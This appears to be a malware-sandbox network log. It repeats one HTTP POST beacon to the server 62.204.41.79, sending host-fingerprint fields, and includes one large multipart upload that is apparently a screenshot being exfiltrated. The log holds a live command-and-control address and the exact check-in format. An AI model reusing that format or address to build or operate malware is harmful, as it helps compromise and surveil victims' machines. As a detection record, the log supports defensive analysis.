Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTEwNjQxHost: 62.204.41.79Content-Length: 110793Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
